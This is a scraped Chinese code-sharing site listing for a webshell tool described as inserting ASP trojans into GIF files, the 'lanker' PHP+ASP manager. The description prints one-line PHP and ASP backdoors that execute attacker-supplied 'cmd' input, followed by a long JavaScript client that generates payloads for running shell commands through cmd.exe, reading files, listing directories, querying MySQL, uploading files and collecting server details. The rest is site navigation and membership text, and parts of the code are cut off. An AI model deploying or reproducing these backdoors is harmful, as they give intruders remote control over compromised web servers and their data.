将asp木马插入gif中调用工具.exe asp php 一起使用的SHELL 工具 <HTM

文件名称: 将asp木马插入gif中调用工具.exe

所属分类: 网管软件

开发工具:

文件大小: 15kb

下载次数: 0

上传时间: 2019-09-05

提供者: qq_36******

下载 (15kb)

不能下载？报告错误

详细说明： asp php 一起使用的SHELL 工具 PHP+ASP --> lanker微型PHP+ASP管理器1.0双用版

木马地址: 密码: 生成器：<?php eval($_POST[cmd];?>

LANKER微型PHP后门服务端代码：

ASP后门服务端代码：
<%execute(request("cmd"))%>

声明:此版为内部版，未经授权允许严禁传给他人和提供公开下载！谢谢合作！By lanker [removed] function showDiv(aa){ switch(aa) { case "1": yunxing[removed]="PHP环境变量
" yunxing[removed]+="

" break; case "3": yunxing[removed]="
执行函数:

" break; case "4": yunxing[removed]="文件路径(不填为当前目录)

asp的不用点浏览，

直接提交
然后就可以上传了
asp的必须带文件名

" break; case "5": yunxing[removed]="
文件名:

" break; case "6": yunxing[removed]="
目录名:

" break; case "7": yunxing[removed]="
文件1:

文件2:

" break; case "8": yunxing[removed]="
文件1:

文件2:

" break; case "9": yunxing[removed]="
文件名:

" break; case "10": yunxing[removed]="
phpinfo();" yunxing[removed]+="

字符转换工具:
要转换的字符:

转换后的字符:

" break; case "11": yunxing[removed]="主机：
数据库：
用户名：
密码：
SQL语句:
" yunxing[removed]+="
" break; case "12": yunxing[removed]="
文件名:
文件内容:

" break; case "13": yunxing[removed]="
文件名:

" break; case "14": yunxing[removed]="
目录名:

" break; case "15": yunxing[removed]="
目录名:

" break; } } function cmd(){ if(getString()) { if (frm.execfun.value ==`){ frm.tmpcmd.value="$cmd=" frm.tmpcmd.value+=duqu(frm.cmdname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n" frm.tmpcmd.value+="echo" frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+="$cmd" frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n" } else{ frm.tmpcmd.value="$cmd=" frm.tmpcmd.value+=duqu(frm.cmdname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n" frm.tmpcmd.value+="echo " frm.tmpcmd.value+=frm.execfun.value frm.tmpcmd.value+="($cmd);\n" frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n" } } else { frm.tmpcmd.value="set objshell=server.createobject(\\"wscript.shell\")\n" frm.tmpcmd.value+="objshell.run(\"cmd.exe /c " frm.tmpcmd.value+=frm.cmdname.value frm.tmpcmd.value+=" > \"&Server;.MapPath(\".\")&\"\\25852.txt\")\n" frm.tmpcmd.value+="response.write \"\"" } } function readfile(){ if(getString()) { frm.tmpcmd.value="$filename=" frm.tmpcmd.value+=duqu(frm.duqu.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n" frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n" frm.tmpcmd.value+="$fp=fopen($filename,r);\n" frm.tmpcmd.value+="$contents=fread($fp, filesize($filename));\n" frm.tmpcmd.value+="fclose($fp);\n" frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n" frm.tmpcmd.value+="echo $s.$contents.$e;\n" } else { frm.tmpcmd.value="function streamReadFromFile(thePath)\\n" frm.tmpcmd.value+="dim stream\n" frm.tmpcmd.value+="set stream=server.createObject(\"adodb.stream\")\n" frm.tmpcmd.value+="with stream\n" frm.tmpcmd.value+=".type=2\n" frm.tmpcmd.value+=".mode=3\n" frm.tmpcmd.value+=".open\n" frm.tmpcmd.value+="on error resume next\n" frm.tmpcmd.value+=".loadFromFile thePath\n" frm.tmpcmd.value+="chkErr err,\"文件无法被打开,请重试!\"\n" frm.tmpcmd.value+=".charset=\"gb2312\"\n" frm.tmpcmd.value+="chkErr err,\"编码类型错误!\"\n" frm.tmpcmd.value+=".Position=2\n" frm.tmpcmd.value+="streamReadFromFile=.readText()\n" frm.tmpcmd.value+=".close\n" frm.tmpcmd.value+="end with\n" frm.tmpcmd.value+="set stream=nothing\n" frm.tmpcmd.value+="end function\n" frm.tmpcmd.value+="response.write \"\"&server;.htmlEncode(streamReadFromFile(\"" frm.tmpcmd.value+=frm.duqu.value frm.tmpcmd.value+="\"))&\"\"\n" } } function readdir(){ if(getString()) { frm.tmpcmd.value="$dir=" frm.tmpcmd.value+=duqu(frm.duqu.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="$dir=dir($dir);" frm.tmpcmd.value+="if($dir) " frm.tmpcmd.value+="{" frm.tmpcmd.value+=" echo path_______.$dir->path.$f;" frm.tmpcmd.value+=" while($entry=$dir->read())" frm.tmpcmd.value+=" {" frm.tmpcmd.value+=" echo ____.$entry.$f; " frm.tmpcmd.value+=" }" frm.tmpcmd.value+=" $dir->close();" frm.tmpcmd.value+="}" frm.tmpcmd.value+="else" frm.tmpcmd.value+="{echo 0;}" } else { frm.tmpcmd.value="thePath=\\"" frm.tmpcmd.value+=frm.duqu.value frm.tmpcmd.value+="\"\ndim ext,flag,list,theHref,theFiles,fileName,theFolder,theFolders\n" frm.tmpcmd.value+="set fso=server.CreateObject(\"Scripting.filesystemobject\")\n" frm.tmpcmd.value+="set theFolder=fso.getFolder(thePath)\n" frm.tmpcmd.value+="set theFiles=theFolder.files\n" frm.tmpcmd.value+="set theFolders=theFolder.subFolders\n" frm.tmpcmd.value+="for each list in theFolders\n" frm.tmpcmd.value+="Response.Write list.path\n" frm.tmpcmd.value+="Response.Write \"
\"\n" frm.tmpcmd.value+="next\n" frm.tmpcmd.value+="for each list in theFiles\n" frm.tmpcmd.value+="Response.Write list.path\n" frm.tmpcmd.value+="Response.Write \"
\"\n" frm.tmpcmd.value+="next" } } function SQL(){ frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\\n" frm.tmpcmd.value+="$fgf=chr(32);\n" if(frm.dbpassword.value !=){ frm.tmpcmd.value+="$dbpassword= " frm.tmpcmd.value+=duqu(frm.dbpassword.value) frm.tmpcmd.value+=";\n" } frm.tmpcmd.value+="$servername=" frm.tmpcmd.value+=duqu(frm.servername.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$dbusername=" frm.tmpcmd.value+=duqu(frm.dbusername.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$dbname=" frm.tmpcmd.value+=duqu(frm.dbname.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="$sql=" frm.tmpcmd.value+=duqu(frm.sql.value) frm.tmpcmd.value+=";\n" frm.tmpcmd.value+="mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n" frm.tmpcmd.value+="mysql_select_db($dbname) or die($message);\n" frm.tmpcmd.value+="$sql=stripslashes($sql);\n" frm.tmpcmd.value+="$result = mysql_query($sql);\n" frm.tmpcmd.value+="while($row=mysql_fetch_array($result,MYSQL_BOTH)){\n" frm.tmpcmd.value+="for($j=0;$j\"\n" frm.tmpcmd.value+="Session(\"M\")=\"dim i,j,info,stream,streamT,theFile,overWrite,fileContent\"&vbCrLf;&\"fileName=\"\"" frm.tmpcmd.value+=frm.uploaddir.value frm.tmpcmd.value+="\"\"\"&vbCrLf;&\"server.scriptTimeOut=5000\"&vbCrLf;&\"set stream=server.createObject(\"\"adodb.stream\"\")\"&vbCrLf;&\"set streamT=server.createObject(\"\"adodb.stream\"\")\"&vbCrLf;&\"with stream\"&vbCrLf;&\".type=1\"&vbCrLf;&\".mode=3\"&vbCrLf;&\".open\"&vbCrLf;&\".write request.binaryRead(request.totalBytes)\"&vbCrLf;&\".position=0\"&vbCrLf;&\"fileContent=.read()\"&vbCrLf;&\"i=instrB(fileContent,chrB(13)&chrB;(10))\"&vbCrLf;&\"info=leftB(fileContent,i-1)\"&vbCrLf;&\"i=len(info)+2\"&vbCrLf;&\"i=instrB(i,fileContent,chrB(13)&chrB;(10)&chrB;(13)&chrB;(10))+4-1\"&vbCrLf;&\"j=instrB(i,fileContent,info)-1\"&vbCrLf;&\"streamT.Type=1\"&vbCrLf;&\"streamT.Mode=3\"&vbCrLf;&\"streamT.Open\"&vbCrLf;&\"stream.position=i\"&vbCrLf;&\".copyTo streamT,j-i-2\"&vbCrLf;&\"streamT.saveToFile fileName,2\"&vbCrLf;&\"response.write \"\"文件上传成功\"\"\"&vbCrLf;&\"streamT.close\"&vbCrLf;&\".close\"&vbCrLf;&\"end with\"&vbCrLf;&\"set stream=nothing\"&vbCrLf;&\"set streamT=nothing\"" frm.submit(); } } function ascchar(){ frm.chrstr.value=duqu(frm.inputstr.value) } function info(){ if(getString()) { frm.tmpcmd.value="echo 服务器系统.chr(58);" frm.tmpcmd.value+="echo PHP_OS;" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo 服务器操作系统文字编码.chr(58);" frm.tmpcmd.value+="echo $_SERVER[HTTP_ACCEPT_LANGUAGE];" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo 服务器IP.chr(58);" frm.tmpcmd.value+="echo $_SERVER[SERVER_NAME];" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo Web服务端口端口.chr(58);" frm.tmpcmd.value+="echo $_SERVER[SERVER_PORT];" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo PHP运行方式.chr(58);" frm.tmpcmd.value+="echo strtoupper(php_sapi_name());" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo PHP版本.chr(58);" frm.tmpcmd.value+="echo PHP_VERSION;" frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);" frm.tmpcmd.value+="echo 本文件路径.chr(58);" frm.tmpcmd.value+="echo $_SERVER[PATH_TRANSLATED];" } else { frm.tmpcmd.value="response.write \\"服务器名————\"&Request;.ServerVariables(\"SERVER_NAME\")\n" frm.tmpcmd.value+="response.write \"
服务器IP————\"&Request;.ServerVariables(\"LOCAL_ADDR\")\n" frm.tmpcmd.value+="response.write \"
服务器端口———\"&Request;.ServerVariables(\"SERVER_PORT\")\n" frm.tmpcmd.value+="response.write \"
服务器时间———\"&now;()\n" frm.tmpcmd.value+="response.write \"
本文件绝对路径—\"&server;.mappath(\".\")\n" frm.tmpcmd.value+="response.write \"
服务器CPU数量—-\"&Request;.ServerVariables(\"NUMBER_OF_PROCESSORS\")\n" frm.tmpcmd.value+="response.write \"
服务器操作系统—\"&Request;.ServerVariables(\"OS\")\n" } } [removed] [removed] function duqu(strcode){ var duqu=""; for(i=1;i

(系统自动生成,下载前可以参看下载内容)
下载文件列表

相关说明

本站资源为会员上传分享交流与学习,如有侵犯您的权益,请联系我们删除.

本站是交换下载平台，提供交流渠道，下载内容来自于网络，除下载问题外，其它问题请自行百度。

本站已设置防盗链，请勿用迅雷、QQ旋风等多线程下载软件下载资源，下载后用WinRAR最新版进行解压.

如果您发现内容无法下载，请稍后再次尝试；或者到消费记录里找到下载记录反馈给我们.

下载后发现下载的内容跟说明不相乎，请到消费记录里找到下载记录反馈给我们，经确认后退回积分.

如下载前有疑问，可以通过点击"提供者"的名字，查看对方的联系方式，联系对方咨询.

相关搜索:

输入关键字，在本站1000多万海量源码库中尽情搜索：

下载资源分类

移动开发

开发技术

课程资源

网络技术

操作系统

安全技术

数据库

行业

服务器应用

存储

信息化

考试认证

云计算

大数据

跨平台

音视频

游戏开发

人工智能

区块链

资源分类

网管软件

网络基础

网络监控

网络设备

系统集成

综合布线

其它

本站统计

资源总数：630万个

资源大小：15TB

今日更新：468个

注册人数：225万

今日注册：838

加入“点数信息”会员

　　“点数信息”是专业的,大型的源码,编程资源等搜索,交换平台,旨在帮助软件开发人员提供源码,编程资源下载,技术交流等服务!目前源码资源大小已超过8TB。
　　超值价格，购买下载积分，即时到帐，无需等待马上可以下载你所需的资料。无限期使用，一次购买越多越优惠！

免费获取积分

　　免费获得积分的途径是通过会员下载您上传的资料，您的帐户即增加积分。
　　立即上传资料，越多越好，被搜索到的机会越大！越早上传越早得积分，下载次数越多，您的积分越多。

合作伙伴

CodeProject

搜珍网

建筑工程网

CSDN.net

建筑资料网